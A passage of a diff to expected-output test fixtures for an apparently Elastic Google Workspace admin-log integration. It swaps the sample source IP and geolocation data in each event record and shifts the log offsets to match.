+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3613,26 +3345,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 29026,
+        "log.offset": 28959,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3653,7 +3381,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3667,26 +3395,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 29457,
+        "log.offset": 29389,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3707,7 +3431,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3720,26 +3444,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 29921,
+        "log.offset": 29852,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3760,7 +3480,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3772,26 +3492,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 30330,
+        "log.offset": 30260,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3812,7 +3528,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -3824,26 +3540,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 30703,
+        "log.offset": 30632,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3864,7 +3576,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3876,26 +3588,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 31067,
+        "log.offset": 30995,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3916,7 +3624,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -3928,26 +3636,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 31440,
+        "log.offset": 31367,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3968,7 +3672,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -3981,26 +3685,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 31804,
+        "log.offset": 31730,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4021,7 +3721,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -4035,26 +3735,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 32202,
+        "log.offset": 32127,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4075,7 +3771,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -4088,26 +3784,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 32644,
+        "log.offset": 32568,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4128,7 +3820,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -4141,26 +3833,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 33082,
+        "log.offset": 33005,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4181,7 +3869,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -4194,26 +3882,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 33523,
+        "log.offset": 33445,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4234,7 +3918,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
